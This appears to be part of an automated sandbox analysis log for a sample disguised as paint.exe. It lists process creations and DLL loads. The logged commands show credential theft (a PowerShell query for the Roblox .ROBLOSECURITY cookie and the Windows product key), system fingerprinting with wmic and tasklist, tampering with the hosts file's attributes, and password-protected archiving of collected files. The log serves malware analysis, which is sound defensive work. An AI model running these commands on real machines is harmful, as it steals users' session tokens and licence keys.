              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES7663.tmp" "c:\Users\user\AppData\Local\Temp\u3oq5ojt\CSCF0203E537737442CADEFC214ABE2ED32.TMP"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\attrib.exe attrib -r C:\Windows\System32\drivers\etc\hosts
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tree.com tree /A /F
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\getmac.exe getmac
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\attrib.exe attrib +r C:\Windows\System32\drivers\etc\hosts
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tree.com tree /A /F
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tree.com tree /A /F
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tree.com tree /A /F
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tree.com tree /A /F
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\_MEI67162\rar.exe C:\Users\user\AppData\Local\Temp\_MEI67162\rar.exe a -r -hp"123" "C:\Users\user\AppData\Local\Temp\S7zJV.zip" *
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic os get Caption
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic computersystem get totalphysicalmemory
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic csproduct get uuid
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic path win32_VideoController get name
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping localhost -n 3
              Source: C:\Users\user\Desktop\paint.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Users\user\Desktop\paint.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Users\user\Desktop\paint.exeSection loaded: vcruntime140.dllJump to behavior
              Source: C:\Users\user\Desktop\paint.exeSection loaded: version.dllJump to behavior
              Source: C:\Users\user\Desktop\paint.exeSection loaded: python3.dllJump to behavior
              Source: C:\Users\user\Desktop\paint.exeSection loaded: libffi-8.dllJump to behavior
              Source: C:\Users\user\Desktop\paint.exeSection loaded: sqlite3.dllJump to behavior
              Source: C:\Users\user\Desktop\paint.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Users\user\Desktop\paint.exeSection loaded: libcrypto-3.dllJump to behavior
              Source: C:\Users\user\Desktop\paint.exeSection loaded: libssl-3.dllJump to behavior
              Source: C:\Users\user\Desktop\paint.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Users\user\Desktop\paint.exeSection loaded: dnsapi.dllJump to behavior
              Source: C:\Users\user\Desktop\paint.exeSection loaded: rasadhlp.dllJump to behavior
              Source: C:\Users\user\Desktop\paint.exeSection loaded: fwpuclnt.dllJump to behavior
              Source: C:\Users\user\Desktop\paint.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Users\user\Desktop\paint.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Users\user\Desktop\paint.exeSection loaded: dpapi.dllJump to behavior
              Source: C:\Users\user\Desktop\paint.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Users\user\Desktop\paint.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Windows\System32\mshta.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\System32\mshta.exeSection loaded: mshtml.dllJump to behavior
              Source: C:\Windows\System32\mshta.exeSection loaded: iertutil.dllJump to behavior
              Source: C:\Windows\System32\mshta.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\System32\mshta.exeSection loaded: powrprof.dllJump to behavior
              Source: C:\Windows\System32\mshta.exeSection loaded: winhttp.dllJump to behavior
              Source: C:\Windows\System32\mshta.exeSection loaded: wkscli.dllJump to behavior
              Source: C:\Windows\System32\mshta.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Windows\System32\mshta.exeSection loaded: umpdc.dllJump to behavior
              Source: C:\Windows\System32\mshta.exeSection loaded: urlmon.dllJump to behavior
              Source: C:\Windows\System32\mshta.exeSection loaded: srvcli.dllJump to behavior
              Source: C:\Windows\System32\mshta.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\System32\mshta.exeSection loaded: msiso.dllJump to behavior
              Source: C:\Windows\System32\mshta.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Windows\System32\mshta.exeSection loaded: srpapi.dllJump to behavior
              Source: C:\Windows\System32\mshta.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\System32\mshta.exeSection loaded: msimtf.dllJump to behavior
              Source: C:\Windows\System32\mshta.exeSection loaded: dxgi.dllJump to behavior
              Source: C:\Windows\System32\mshta.exeSection loaded: resourcepolicyclient.dllJump to behavior
              Source: C:\Windows\System32\mshta.exeSection loaded: textinputframework.dllJump to behavior
              Source: C:\Windows\System32\mshta.exeSection loaded: coreuicomponents.dllJump to behavior
              Source: C:\Windows\System32\mshta.exeSection loaded: coremessaging.dllJump to behavior
              Source: C:\Windows\System32\mshta.exeSection loaded: ntmarta.dllJump to behavior
              Source: C:\Windows\System32\mshta.exeSection loaded: coremessaging.dllJump to behavior
              Source: C:\Windows\System32\mshta.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Windows\System32\mshta.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Windows\System32\mshta.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Windows\System32\mshta.exeSection loaded: dataexchange.dllJump to behavior
              Source: C:\Windows\System32\mshta.exeSection loaded: d3d11.dllJump to behavior
              Source: C:\Windows\System32\mshta.exeSection loaded: dcomp.dllJump to behavior
              Source: C:\Windows\System32\mshta.exeSection loaded: twinapi.appcore.dllJump to behavior
              Source: C:\Windows\System32\mshta.exeSection loaded: jscript9.dllJump to behavior
              Source: C:\Windows\System32\mshta.exeSection loaded: mpr.dllJump to behavior
              Source: C:\Windows\System32\mshta.exeSection loaded: scrrun.dllJump to behavior
              Source: C:\Windows\System32\mshta.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\System32\mshta.exeSection loaded: sxs.dllJump to behavior
              Source: C:\Windows\System32\mshta.exeSection loaded: textshaping.dllJump to behavior
              Source: C:\Windows\System32\mshta.exeSection loaded: dxcore.dllJump to behavior
              Source: C:\Windows\System32\mshta.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Windows\System32\attrib.exeSection loaded: ulib.dll
              Source: C:\Windows\System32\attrib.exeSection loaded: fsutilext.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: version.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: mpr.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: framedynos.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: dbghelp.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: srvcli.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: netutils.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: wbemcomn.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: winsta.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: amsi.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: userenv.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: profapi.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: version.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: mpr.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: framedynos.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: dbghelp.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: srvcli.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: netutils.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: wbemcomn.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: winsta.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: amsi.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: userenv.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: profapi.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: version.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: mpr.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: framedynos.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: dbghelp.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: srvcli.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: netutils.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: wbemcomn.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: winsta.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: amsi.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: userenv.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: profapi.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: ifmon.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: iphlpapi.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: mprapi.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: rasmontr.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: rasapi32.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: fwpuclnt.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: rasman.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: mfc42u.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: rasman.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: authfwcfg.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: fwpolicyiomgr.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: firewallapi.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: dnsapi.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: fwbase.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: dhcpcmonitor.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: dot3cfg.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: dot3api.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: onex.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: eappcfg.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: ncrypt.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: eappprxy.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: ntasn1.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: fwcfg.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: hnetmon.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: netshell.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: nlaapi.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: netsetupapi.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: netiohlp.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: dhcpcsvc.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: winnsi.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: nettrace.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: sspicli.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: nshhttp.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: httpapi.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: nshipsec.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: userenv.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: activeds.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: polstore.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: winipsec.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: adsldpc.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: nshwfp.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: cabinet.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: p2pnetsh.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: p2p.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: profapi.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: cryptbase.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: rpcnsh.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: wcnnetsh.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: wlanapi.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: whhelper.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: winhttp.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: wlancfg.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: cryptsp.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: wshelper.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: wevtapi.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: mswsock.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: wwancfg.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: wwapi.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: wcmapi.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: rmclient.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: mobilenetworking.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: peerdistsh.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: uxtheme.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: slc.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: sppc.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: gpapi.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: ktmw32.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: mprmsg.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: windows.storage.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: wldp.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: msasn1.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: edputil.dll
              Source: C:\Windows\System32\tree.comSection loaded: ulib.dll
              Source: C:\Windows\System32\tree.comSection loaded: fsutilext.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iphlpapi.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: framedynos.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sspicli.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: kernel.appcore.dll
